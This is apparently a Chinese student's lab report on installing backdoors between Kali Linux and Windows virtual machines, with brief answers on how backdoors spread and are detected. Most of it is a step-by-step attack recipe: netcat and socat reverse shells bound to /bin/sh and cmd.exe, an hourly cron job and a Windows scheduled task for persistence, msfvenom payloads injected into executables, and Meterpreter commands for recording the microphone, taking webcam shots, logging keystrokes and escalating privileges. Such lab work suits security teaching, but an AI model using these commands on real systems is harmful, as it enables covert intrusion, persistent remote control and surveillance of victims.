返回目錄html
例舉你能想到的一個後門進入到你係統中的可能方式?linux
有時在網頁版下載軟件的安裝包時,會藏有後門程序,當啓動安裝包進行安裝,後門就潛入到系統中。web
例舉你知道的後門如何啓動起來(win及linux)的方式?shell
- 假裝成經常使用軟件,誘使用戶點擊
- 遠程監遵從而反向鏈接被控主機,發送後門,控制後門啓動
- linux的cron程序被修改,使得自動定時執行後門程序
Meterpreter有哪些給你映像深入的功能?windows
能夠獲取被控主機的音頻文件、開啓攝像頭和錄像功能,捕獲畫面。安全
如何發現本身有系統有沒有被安裝後門?tcp
- 按期用電腦所下載的殺毒軟件對系統進行檢測,及時處理可疑程序
- 開啓防火牆,查看開啓的端口及對應的進程,通常不是系統默認開啓的端口都是可疑的,再結合對應進程的抓包查看通訊數據分析是否爲後門。
返回目錄編輯器
ncat
,可使用man netcat
或man nc
可查看其使用說明ncat.exe -l -p 5330
nc 192.168.56.1 5330 -e /bin/sh
(IP爲win IP)ls
nc -l -p 5330
ncat.exe -e cmd.exe 192.168.107.128 5330
(IP爲Linux IP)ncat.exe -l -p 5330
ncat 192.168.56.1 5330
(IP爲win IP)socat
是ncat
的加強版,它使用的格式是socat [options] <address> <address>
,其中兩個address
是必選項,而options
是可選項。socat
的基本功能就是創建兩個雙向的字節流,數據就在其間傳輸,參數address就是表明了其中的一個方向。所謂流,表明了數據的流向,而數據則能夠有許多不一樣的類型,命令中也就相應須要許多選項對各類不一樣的類型數據流進行限定與說明。msfvenom -p windows/meterpreter/reverse_http lhost=192.168.56.1 lport=5330 -f c
(IP爲Win IP)生成shellcode,注入到可執行文件,執行時回連攻擊主機。返回目錄工具
ipconfig
查看Windows的IP地址爲192.168.56.1
ncat.exe -l 5330
監聽5330
端口crontab -e
指令編輯一條定時任務,選擇編輯器時選擇"3",在底行插入30 * * * * /bin/netcat 192.168.56.1 5330 -e /bin/sh
(意爲在每一個小時的第30分鐘反向鏈接Windows的5330端口):wq
保存退出配置即生效,可經過crontab -l
查看右鍵
-計算機管理
-任務計劃程序
-建立任務
常規
中填寫任務名稱後(我填寫了win),觸發器
-新建
新建觸發器,而後肯定操做
-新建
,導入你所下載解壓後的socat.exe
的路徑,在添加參數
中填入tcp-listen:5330 exec:cmd.exe,pty,stderr
(意爲把cmd.exe
綁定到端口5330
,同時把cmd.exe
的stderr
重定向到stdout
上)Windows+L
快捷鍵鎖定計算機,再次打開時,雙擊任務計劃程序庫
能夠發現以前建立的任務已經開始運行socat - tcp:192.168.56.1:5330
(-
表明標準的輸入輸出,第二個流鏈接到Windows主機的5330端口,IP爲windows的IP),接着能夠發現已經成功得到一個cmd shellmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.246.128 LPORT=5330 -f exe > 20165330_backdoor.exe
(IP爲kali的IP)生成後門程序20165330_backdoor.exe
ncat.exe -lv 5330 > 20165330_backdoor.exe
查看鏈接狀態nc 192.168.56.1 5330 < 20165330_backdoor.exe
(此處的IP爲Windows的IP)將生成的後門程序傳送到Windows主機上msfconsole
進入msf控制檯use exploit/multi/handler
使用監聽模塊,設置payloadset payload windows/meterpreter/reverse_tcp
set LHOST 192.168.246.128
此處爲kali的IP(和生成後門程序時指定的IP相同)set LPORT 5330
exploit
開始監聽ctrl+c
退出上條命令,在執行:20165330_backdoor.exe
(注意電腦的防火牆和殺毒軟件要關掉),發現kali得到Windows主機的鏈接,而且獲得了遠程控制的shellexploit
record_mic
能夠截獲一段音頻webcam_snap
可使用攝像頭進行拍照screenshot
能夠進行截屏keyscan_start
指令開始記錄下擊鍵的過程,使用keyscan_dump
指令讀取擊鍵的記錄getuid
查看當前用戶,使用getsystem
進行提權參考博客:任胤同窗博客,學姐博客,msfvenom命令說明
第一種:ui
- 這裏是kali本身監聽本身,首先生成一段
shellcode
:msfvenom -p linux/x86/meterpreter/shell_reverse_tcp -b '\x00\x0a\0d' LHOST=192.168.246.128 LPORT=5330 -f c
(IP爲kali本身的IP)
- 使用實驗一中的第三部分步驟將生成的
shellcode
注入到pwn1
中(注意去掉引號和空格),步驟點這裏,隨後找到shellcode地址
爲0xffffd370
- 注入成功後,kali中打開新的終端,輸入
msfconsole
進入MSF控制檯
- 輸入
use exploit/multi/handler
使用監聽模塊,設置payload- 使用和生成後門程序時相同的payload:
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.246.128
此處爲kali的IP(和生成後門程序時指定的IP相同)- 端口號也相同:
set LPORT 5330
- 設置完成後,
exploit
開始監聽
- 舊的終端中運行
pwn1
:(cat input_shellcode;cat) | ./pwn1
- 發現沒有反應。。。緣由在於生成的
shellcode
有問題。。
第二種:
- MSF能夠實現直接將shellcode注入可執行文件
- 使用命令
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.246.128 LPORT=5330 -x /root/pwn2 -f elf > pwn3
(-x
參數爲指定一個自定義的可執行文件做爲模板,這裏將shellcode
弄到pwn1
模板中)
msfconsole
進入MSF控制檯
- 輸入
use exploit/multi/handler
使用監聽模塊,設置payload- 使用和生成後門程序時相同的payload:
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.246.128
此處爲kali的IP(和生成後門程序時指定的IP相同)- 端口號也相同:
set LPORT 5330
- 設置完成後,
exploit
開始監聽- 加權限運行
pwn3
- 獲得shell命令
第三種(符合要求的)
- 在官網下載生成好的shellcode
- 將其中的code部分注入
pwn1
- 打開新的終端進入msf控制檯:
msfconsole
- 輸入
use exploit/multi/handler
使用監聽模塊,設置payload- 使用和生成後門程序時相同的payload:
set payload linux/x86/shell_reverse_tcp
set LHOST 127.0.0.1
此處爲kali的IP(和生成後門程序時指定的IP相同)- 端口號也相同:
set LPORT 4444
- 設置完成後,
exploit
開始監聽
- 執行:
(cat input_shellcode;cat) | ./pwn1
(注意回車)
- 發現已得到shell
ps:若是沒成功把注入的部分從頭開始再找一遍地址從頭開始注入
在進入msf控制檯時,發現進入不了,出現如下錯誤
解決辦法:我一開始成功進入之後,又退出,後面重複屢次生成後門程序,可能這其中致使程序再也不是原始的,我將兩邊的程序都刪除後,重啓電腦在從新按步驟後成功。
在進入msf控制檯後,進入監聽是報錯,出現Session manipulation failed: Cannot allocate memory
解決辦法:該錯誤是提示沒法分配內存,我設置的內存是1G,將虛擬機關機,進入
虛擬機
-設置
-內存
,將內存改大一倍在開啓虛擬機便可。